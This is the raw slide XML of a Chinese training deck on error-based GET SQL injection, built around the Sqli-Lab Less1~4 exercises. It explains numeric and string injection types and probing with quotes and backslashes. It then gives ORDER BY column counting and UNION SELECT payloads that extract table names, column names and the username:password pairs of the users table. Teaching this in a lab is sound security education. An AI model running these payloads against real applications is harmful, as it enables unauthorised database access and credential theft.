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基于报错的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注入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进行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注入漏洞利用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1384935"/>
            <a:ext cx="10709910" cy="4871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8910" y="2884170"/>
            <a:ext cx="5793105" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="579310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029305" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="4029305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459393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SQL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注入的分类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52089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GET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基于报错的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注入发现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105843" y="2914333"/>
            <a:ext cx="5793105" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="5793107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520890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GET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基于报错的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510079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8910" y="2884170"/>
            <a:ext cx="5793105" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="579310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029305" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="4029305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459393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SQL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注入的分类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52089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GET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基于报错的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注入发现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105843" y="2914333"/>
            <a:ext cx="5793105" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="5793107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520890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GET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基于报错的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852545" y="3081655"/>
            <a:ext cx="44875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注入的分类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根据注入位置数据类型可将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注入分为两类：数字型和字符型。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224980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例如：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数字型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from table where id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id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341820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例如：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字符型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from table where id = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id'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1257935"/>
            <a:ext cx="8803005" cy="5242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2140" y="3163570"/>
            <a:ext cx="56318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基于报错的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注入发现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55" y="32448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实验：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sqli-Lab Less1~4,GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于报错的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125984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通过在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中修改对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>值，为正常数字、大数字、字符（单引号、双引号、双单引号、括号）、反斜杠 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来探测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中是否存在注入点。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3756025"/>
            <a:ext cx="10794365" cy="2357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18765" y="3163570"/>
            <a:ext cx="64547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基于报错的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注入利用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4235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、利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>判断字段数。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90805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、利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>联合查询，获取表名。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0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+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83007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、利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>联合查询，获取字段名。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0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+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286829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、利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>联合查询，获取字段值。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0' union select 1,group_concat(username,0x3a,password),3 from users--+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3624580"/>
            <a:ext cx="10059670" cy="2510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WPS 演示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SQL注入的分类</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>GET基于报错的SQL注入发现</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>GET基于报错的SQL注入利用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>利用Sqlmap测试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92</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-29T13:01:43Z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